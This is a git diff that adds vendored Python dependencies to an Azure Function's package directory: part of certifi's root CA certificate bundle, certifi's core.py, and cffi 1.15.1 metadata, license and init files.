+aFySpvXl8wo0tf97ouSHocavFwDvA5HtqRxOcT3Si2yJ9HiG5mpJoM610rCrm/b0 +1C7jcvk2xusVtyWMOvwlDbMicyF0yEqWYZL1LwsYpfSt4u5BvQF5+paMjRcCMLT5 +r3gajLQ2EBAHBXDQ9DGQilHFhiZ5shGIXsXwClTNSaa/ApzSRKft43jvRl5tcdF5 +cBxGX1HpyTfcX35pe0HfNEXgO4T0oYoKNp43zGJS4YkNKPl6I7ENPT2a/Z2B7yyQ +wHtETrtJ4A5KVpK8y7XdeReJkd5hiXSSqOMyhb5OhaRLWcsrxXiOcVTQAjeZjOVJ +6uBUcqQRBi8LjMFbvrWhsFNunLhgkR9Za/kt9JQKl7XsxXYDVBtlUrpMklZRNaBA +2CnbrlJ2Oy0wQJuK0EJWtLeIAaSHO1OWzaMWj/Nmqhexx2DgwUMFDO6bW2BvBlyH +Wyf5QBGenDPBt+U1VwV/J84XIIwc/PH72jEpSe31C4SnT8H2TsIonPru4K8H+zMR +eiFPCyEQtkA6qyI6BJyLm4SGcprSp6XEtHWRqSsjAgMBAAGjQjBAMA4GA1UdDwEB +/wQEAwIBBjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTgqj8ljZ9EXME66C6u +d0yEPmcM9DANBgkqhkiG9w0BAQsFAAOCAgEAuVevuBLaV4OPaAszHQNTVfSVcOQr +PbA56/qJYv331hgELyE03fFo8NWWWt7CgKPBjcZq91l3rhVkz1t5BXdm6ozTaw3d +8VkswTOlMIAVRQdFGjEitpIAq5lNOo93r6kiyi9jyhXWx8bwPWz8HA2YEGGeEaIi +1wrykXprOQ4vMMM2SZ/g6Q8CRFA3lFV96p/2O7qUpUzpvD5RtOjKkjZUbVwlKNrd +rRT90+7iIgXr0PK3aBLXWopBGsaSpVo7Y0VPv+E6dyIvXL9G+VoDhRNCX8reU9di +taY1BMJH/5n9hN9czulegChB8n3nHpDYT3Y+gjwN/KUD+nsa2UUeYNrEjvn8K8l7 +lcUq/6qJ34IxD3L/DCfXCh5WAFAeDJDBlrXYFIW7pw0WwfgHJBu6haEaBQmAupVj +yTrsJZ9/nbqkRxWbRHDxakvWOF5D8xh+UG7pWijmZeZ3Gzr9Hb4DJqPb1OG7fpYn +Kx3upPvaJVQTA945xsMfTZDsjxtK0hzthZU4UHlG1sGQUDGpXJpuHfUzVounmdLy +yCwzk5Iwx06MZTMQZBf9JBeW0Y3COmor6xOLRPIh80oat3df1+2IpHLlOR+Vnb5n +wXARPbv0+Em34yaXOp/SX3z7wJl8OSngex2/DaeP0ik0biQVy96QXr8axGbqwua6 +OV+KmalBWQewLK8= +-----END CERTIFICATE----- + +# Issuer: CN=Certainly Root E1 O=Certainly +# Subject: CN=Certainly Root E1 O=Certainly +# Label: "Certainly Root E1" +# Serial: 8168531406727139161245376702891150584 +# MD5 Fingerprint: 0a:9e:ca:cd:3e:52:50:c6:36:f3:4b:a3:ed:a7:53:e9 +# SHA1 Fingerprint: f9:e1:6d:dc:01:89:cf:d5:82:45:63:3e:c5:37:7d:c2:eb:93:6f:2b +# SHA256 Fingerprint: b4:58:5f:22:e4:ac:75:6a:4e:86:12:a1:36:1c:5d:9d:03:1a:93:fd:84:fe:bb:77:8f:a3:06:8b:0f:c4:2d:c2 +-----BEGIN CERTIFICATE----- +MIIB9zCCAX2gAwIBAgIQBiUzsUcDMydc+Y2aub/M+DAKBggqhkjOPQQDAzA9MQsw +CQYDVQQGEwJVUzESMBAGA1UEChMJQ2VydGFpbmx5MRowGAYDVQQDExFDZXJ0YWlu +bHkgUm9vdCBFMTAeFw0yMTA0MDEwMDAwMDBaFw00NjA0MDEwMDAwMDBaMD0xCzAJ +BgNVBAYTAlVTMRIwEAYDVQQKEwlDZXJ0YWlubHkxGjAYBgNVBAMTEUNlcnRhaW5s +eSBSb290IEUxMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE3m/4fxzf7flHh4axpMCK 
++IKXgOqPyEpeKn2IaKcBYhSRJHpcnqMXfYqGITQYUBsQ3tA3SybHGWCA6TS9YBk2 +QNYphwk8kXr2vBMj3VlOBF7PyAIcGFPBMdjaIOlEjeR2o0IwQDAOBgNVHQ8BAf8E +BAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQU8ygYy2R17ikq6+2uI1g4 +hevIIgcwCgYIKoZIzj0EAwMDaAAwZQIxALGOWiDDshliTd6wT99u0nCK8Z9+aozm +ut6Dacpps6kFtZaSF4fC0urQe87YQVt8rgIwRt7qy12a7DLCZRawTDBcMPPaTnOG +BtjOiQRINzf43TNRnXCve1XYAS59BWQOhriR +-----END CERTIFICATE----- + +# Issuer: CN=E-Tugra Global Root CA RSA v3 O=E-Tugra EBG A.S. OU=E-Tugra Trust Center +# Subject: CN=E-Tugra Global Root CA RSA v3 O=E-Tugra EBG A.S. OU=E-Tugra Trust Center +# Label: "E-Tugra Global Root CA RSA v3" +# Serial: 75951268308633135324246244059508261641472512052 +# MD5 Fingerprint: 22:be:10:f6:c2:f8:03:88:73:5f:33:29:47:28:47:a4 +# SHA1 Fingerprint: e9:a8:5d:22:14:52:1c:5b:aa:0a:b4:be:24:6a:23:8a:c9:ba:e2:a9 +# SHA256 Fingerprint: ef:66:b0:b1:0a:3c:db:9f:2e:36:48:c7:6b:d2:af:18:ea:d2:bf:e6:f1:17:65:5e:28:c4:06:0d:a1:a3:f4:c2 +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# Issuer: CN=E-Tugra Global Root CA ECC v3 O=E-Tugra EBG A.S. OU=E-Tugra Trust Center +# Subject: CN=E-Tugra Global Root CA ECC v3 O=E-Tugra EBG A.S. 
OU=E-Tugra Trust Center +# Label: "E-Tugra Global Root CA ECC v3" +# Serial: 218504919822255052842371958738296604628416471745 +# MD5 Fingerprint: 46:bc:81:bb:f1:b5:1e:f7:4b:96:bc:14:e2:e7:27:64 +# SHA1 Fingerprint: 8a:2f:af:57:53:b1:b0:e6:a1:04:ec:5b:6a:69:71:6d:f6:1c:e2:84 +# SHA256 Fingerprint: 87:3f:46:85:fa:7f:56:36:25:25:2e:6d:36:bc:d7:f1:6f:c2:49:51:f2:64:e4:7e:1b:95:4f:49:08:cd:ca:13 +-----BEGIN CERTIFICATE----- +MIICpTCCAiqgAwIBAgIUJkYZdzHhT28oNt45UYbm1JeIIsEwCgYIKoZIzj0EAwMw +gYAxCzAJBgNVBAYTAlRSMQ8wDQYDVQQHEwZBbmthcmExGTAXBgNVBAoTEEUtVHVn +cmEgRUJHIEEuUy4xHTAbBgNVBAsTFEUtVHVncmEgVHJ1c3QgQ2VudGVyMSYwJAYD +VQQDEx1FLVR1Z3JhIEdsb2JhbCBSb290IENBIEVDQyB2MzAeFw0yMDAzMTgwOTQ2 +NThaFw00NTAzMTIwOTQ2NThaMIGAMQswCQYDVQQGEwJUUjEPMA0GA1UEBxMGQW5r +YXJhMRkwFwYDVQQKExBFLVR1Z3JhIEVCRyBBLlMuMR0wGwYDVQQLExRFLVR1Z3Jh +IFRydXN0IENlbnRlcjEmMCQGA1UEAxMdRS1UdWdyYSBHbG9iYWwgUm9vdCBDQSBF +Q0MgdjMwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAASOmCm/xxAeJ9urA8woLNheSBkQ +KczLWYHMjLiSF4mDKpL2w6QdTGLVn9agRtwcvHbB40fQWxPa56WzZkjnIZpKT4YK +fWzqTTKACrJ6CZtpS5iB4i7sAnCWH/31Rs7K3IKjYzBhMA8GA1UdEwEB/wQFMAMB +Af8wHwYDVR0jBBgwFoAU/4Ixcj75xGZsrTie0bBRiKWQzPUwHQYDVR0OBBYEFP+C +MXI++cRmbK04ntGwUYilkMz1MA4GA1UdDwEB/wQEAwIBBjAKBggqhkjOPQQDAwNp +ADBmAjEA5gVYaWHlLcoNy/EZCL3W/VGSGn5jVASQkZo1kTmZ+gepZpO6yGjUij/6 +7W4WAie3AjEA3VoXK3YdZUKWpqxdinlW2Iob35reX8dQj7FbcQwm32pAAOwzkSFx +vmjkI6TZraE3 +-----END CERTIFICATE----- diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/core.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/core.py new file mode 100644 index 0000000..2b2b802 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/core.py @@ -0,0 +1,68 @@ +""" +certifi.py +~~~~~~~~~~ + +This module returns the installation location of cacert.pem or its contents. +""" +import os +import types +from typing import Union + +try: + from importlib.resources import path as get_path, read_text + + _CACERT_CTX = None + _CACERT_PATH = None + + def where() -> str: + # This is slightly terrible, but we want to delay extracting the file + # in cases where we're inside of a zipimport situation until someone + # actually calls where(), but we don't want to re-extract the file + # on every call of where(), so we'll do it once then store it in a + # global variable. + global _CACERT_CTX + global _CACERT_PATH + if _CACERT_PATH is None: + # This is slightly janky, the importlib.resources API wants you to + # manage the cleanup of this file, so it doesn't actually return a + # path, it returns a context manager that will give you the path + # when you enter it and will do any cleanup when you leave it. In + # the common case of not needing a temporary file, it will just + # return the file system location and the __exit__() is a no-op. + # + # We also have to hold onto the actual context manager, because + # it will do the cleanup whenever it gets garbage collected, so + # we will also store that at the global level as well. + _CACERT_CTX = get_path("certifi", "cacert.pem") + _CACERT_PATH = str(_CACERT_CTX.__enter__()) + + return _CACERT_PATH + + +except ImportError: + Package = Union[types.ModuleType, str] + Resource = Union[str, "os.PathLike"] + + # This fallback will work for Python versions prior to 3.7 that lack the + # importlib.resources module but relies on the existing `where` function + # so won't address issues with environments like PyOxidizer that don't set + # __file__ on modules. 
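+ # Illustrative aside (an added sketch, not part of upstream certifi):
+ # whichever branch ends up defining where(), callers consume it the same
+ # way, typically to build a TLS context that trusts this CA bundle:
+ #
+ # import ssl
+ # import certifi
+ # ctx = ssl.create_default_context(cafile=certifi.where())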
+ def read_text( + package: Package, + resource: Resource, + encoding: str = 'utf-8', + errors: str = 'strict' + ) -> str: + with open(where(), encoding=encoding) as data: + return data.read() + + # If we don't have importlib.resources, then we will just do the old logic + # of assuming we're on the filesystem and munge the path directly. + def where() -> str: + f = os.path.dirname(__file__) + + return os.path.join(f, "cacert.pem") + + +def contents() -> str: + return read_text("certifi", "cacert.pem", encoding="ascii") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/LICENSE new file mode 100644 index 0000000..e705745 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/LICENSE @@ -0,0 +1,26 @@ + +Except when otherwise stated (look for LICENSE files in directories or +information at the beginning of each file) all software and +documentation is licensed as follows: + + The MIT License + + Permission is hereby granted, free of charge, to any person + obtaining a copy of this software and associated documentation + files (the "Software"), to deal in the Software without + restriction, including without limitation the rights to use, + copy, modify, merge, publish, distribute, sublicense, and/or + sell copies of the Software, and to permit persons to whom the + Software is furnished to do so, subject to the following conditions: + + The above copyright notice and this permission notice shall be included + in all copies or substantial portions of the Software. + + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS + OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER + DEALINGS IN THE SOFTWARE. + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/METADATA new file mode 100644 index 0000000..3e4d090 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/METADATA @@ -0,0 +1,34 @@ +Metadata-Version: 2.1 +Name: cffi +Version: 1.15.1 +Summary: Foreign Function Interface for Python calling C code. 
+Home-page: http://cffi.readthedocs.org
+Author: Armin Rigo, Maciej Fijalkowski
+Author-email: python-cffi@googlegroups.com
+License: MIT
+Classifier: Programming Language :: Python
+Classifier: Programming Language :: Python :: 2
+Classifier: Programming Language :: Python :: 2.7
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.6
+Classifier: Programming Language :: Python :: 3.7
+Classifier: Programming Language :: Python :: 3.8
+Classifier: Programming Language :: Python :: 3.9
+Classifier: Programming Language :: Python :: 3.10
+Classifier: Programming Language :: Python :: Implementation :: CPython
+Classifier: Programming Language :: Python :: Implementation :: PyPy
+Classifier: License :: OSI Approved :: MIT License
+License-File: LICENSE
+Requires-Dist: pycparser
+
+
+CFFI
+====
+
+Foreign Function Interface for Python calling C code.
+Please see the `Documentation <http://cffi.readthedocs.org/>`_.
+
+Contact
+-------
+
+`Mailing list <https://groups.google.com/forum/#!forum/python-cffi>`_ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/RECORD new file mode 100644 index 0000000..d380c8f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/RECORD @@ -0,0 +1,44 @@
+_cffi_backend.cpython-39-x86_64-linux-gnu.so,sha256=qsQ76hjYdszjTdFV9NI0mnEkr6uMz56ZMzB7JbnKVTg,981144
+cffi-1.15.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4
+cffi-1.15.1.dist-info/LICENSE,sha256=BLgPWwd7vtaICM_rreteNSPyqMmpZJXFh72W3x6sKjM,1294
+cffi-1.15.1.dist-info/METADATA,sha256=KP4G3WmavRgDGwD2b8Y_eDsM1YeV6ckcG6Alz3-D8VY,1144
+cffi-1.15.1.dist-info/RECORD,,
+cffi-1.15.1.dist-info/WHEEL,sha256=FNUt4eBsrBVn_Yc5KG3aXtKE40X3uNZrbGLNCbVxyFw,148
+cffi-1.15.1.dist-info/entry_points.txt,sha256=y6jTxnyeuLnL-XJcDv8uML3n6wyYiGRg8MTp_QGJ9Ho,75
+cffi-1.15.1.dist-info/top_level.txt,sha256=rE7WR3rZfNKxWI9-jn6hsHCAl7MDkB-FmuQbxWjFehQ,19
+cffi/__init__.py,sha256=6xB_tafGvhhM5Xvj0Ova3oPC2SEhVlLTEObVLnazeiM,513
+cffi/__pycache__/__init__.cpython-39.pyc,,
+cffi/__pycache__/api.cpython-39.pyc,,
+cffi/__pycache__/backend_ctypes.cpython-39.pyc,,
+cffi/__pycache__/cffi_opcode.cpython-39.pyc,,
+cffi/__pycache__/commontypes.cpython-39.pyc,,
+cffi/__pycache__/cparser.cpython-39.pyc,,
+cffi/__pycache__/error.cpython-39.pyc,,
+cffi/__pycache__/ffiplatform.cpython-39.pyc,,
+cffi/__pycache__/lock.cpython-39.pyc,,
+cffi/__pycache__/model.cpython-39.pyc,,
+cffi/__pycache__/pkgconfig.cpython-39.pyc,,
+cffi/__pycache__/recompiler.cpython-39.pyc,,
+cffi/__pycache__/setuptools_ext.cpython-39.pyc,,
+cffi/__pycache__/vengine_cpy.cpython-39.pyc,,
+cffi/__pycache__/vengine_gen.cpython-39.pyc,,
+cffi/__pycache__/verifier.cpython-39.pyc,,
+cffi/_cffi_errors.h,sha256=zQXt7uR_m8gUW-fI2hJg0KoSkJFwXv8RGUkEDZ177dQ,3908
+cffi/_cffi_include.h,sha256=tKnA1rdSoPHp23FnDL1mDGwFo-Uj6fXfA6vA6kcoEUc,14800
+cffi/_embedding.h,sha256=9tnjF44QRobR8z0FGqAmAZY-wMSBOae1SUPqHccowqc,17680
+cffi/api.py,sha256=yxJalIePbr1mz_WxAHokSwyP5CVYde44m-nolHnbJNo,42064
+cffi/backend_ctypes.py,sha256=h5ZIzLc6BFVXnGyc9xPqZWUS7qGy7yFSDqXe68Sa8z4,42454
+cffi/cffi_opcode.py,sha256=v9RdD_ovA8rCtqsC95Ivki5V667rAOhGgs3fb2q9xpM,5724
+cffi/commontypes.py,sha256=QS4uxCDI7JhtTyjh1hlnCA-gynmaszWxJaRRLGkJa1A,2689
+cffi/cparser.py,sha256=rO_1pELRw1gI1DE1m4gi2ik5JMfpxouAACLXpRPlVEA,44231
+cffi/error.py,sha256=v6xTiS4U0kvDcy4h_BDRo5v39ZQuj-IMRYLv5ETddZs,877
+cffi/ffiplatform.py,sha256=HMXqR8ks2wtdsNxGaWpQ_PyqIvtiuos_vf1qKCy-cwg,4046 +cffi/lock.py,sha256=l9TTdwMIMpi6jDkJGnQgE9cvTIR7CAntIJr8EGHt3pY,747 +cffi/model.py,sha256=_GH_UF1Rn9vC4AvmgJm6qj7RUXXG3eqKPc8bPxxyBKE,21768 +cffi/parse_c_type.h,sha256=OdwQfwM9ktq6vlCB43exFQmxDBtj2MBNdK8LYl15tjw,5976 +cffi/pkgconfig.py,sha256=LP1w7vmWvmKwyqLaU1Z243FOWGNQMrgMUZrvgFuOlco,4374 +cffi/recompiler.py,sha256=YgVYTh2CrXIobo-vMk7_K9mwAXdd_LqB4-IbYABQ488,64598 +cffi/setuptools_ext.py,sha256=RUR17N5f8gpiQBBlXL34P9FtOu1mhHIaAf3WJlg5S4I,8931 +cffi/vengine_cpy.py,sha256=YglN8YS-UaHEv2k2cxgotNWE87dHX20-68EyKoiKUYA,43320 +cffi/vengine_gen.py,sha256=5dX7s1DU6pTBOMI6oTVn_8Bnmru_lj932B6b4v29Hlg,26684 +cffi/verifier.py,sha256=ESwuXWXtXrKEagCKveLRDjFzLNCyaKdqAgAlKREcyhY,11253 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/WHEEL new file mode 100644 index 0000000..486a29a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: false +Tag: cp39-cp39-manylinux_2_17_x86_64 +Tag: cp39-cp39-manylinux2014_x86_64 + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/entry_points.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/entry_points.txt new file mode 100644 index 0000000..987748d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/entry_points.txt @@ -0,0 +1,2 @@ +[distutils.setup_keywords] +cffi_modules = cffi.setuptools_ext:cffi_modules diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/top_level.txt new file mode 100644 index 0000000..fde771f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/top_level.txt @@ -0,0 +1,2 @@ +_cffi_backend +cffi diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__init__.py new file mode 100644 index 0000000..b955537 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__init__.py @@ -0,0 +1,14 @@ +__all__ = ['FFI', 'VerificationError', 'VerificationMissing', 'CDefError', + 'FFIError'] + +from .api import FFI +from .error import CDefError, FFIError, VerificationError, VerificationMissing +from .error import PkgConfigError + +__version__ = "1.15.1" +__version_info__ = (1, 15, 1) + +# The verifier module file names are based on the CRC32 of a string that +# contains the following version number. It may be older than __version__ +# if nothing is clearly incompatible. 
+__version_verifier_modules__ = "0.8.6" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..93e92e7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/api.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/api.cpython-39.pyc new file mode 100644 index 0000000..798c3ee Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/api.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/backend_ctypes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/backend_ctypes.cpython-39.pyc new file mode 100644 index 0000000..d31d15d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/backend_ctypes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cffi_opcode.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cffi_opcode.cpython-39.pyc new file mode 100644 index 0000000..f95594e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cffi_opcode.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/commontypes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/commontypes.cpython-39.pyc new file mode 100644 index 0000000..6ff9cbe Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/commontypes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cparser.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cparser.cpython-39.pyc new file mode 100644 index 0000000..0348783 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cparser.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/error.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/error.cpython-39.pyc new file mode 100644 index 0000000..7f5b18b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/error.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/ffiplatform.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/ffiplatform.cpython-39.pyc new file mode 100644 index 0000000..3d30957 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/ffiplatform.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/lock.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/lock.cpython-39.pyc new file mode 100644 index 0000000..52a8164 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/lock.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/model.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/model.cpython-39.pyc new file mode 100644 index 0000000..1910df7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/model.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/pkgconfig.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/pkgconfig.cpython-39.pyc new file mode 100644 index 0000000..5b00aec Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/pkgconfig.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/recompiler.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/recompiler.cpython-39.pyc new file mode 100644 index 0000000..73abb68 Binary files /dev/null and 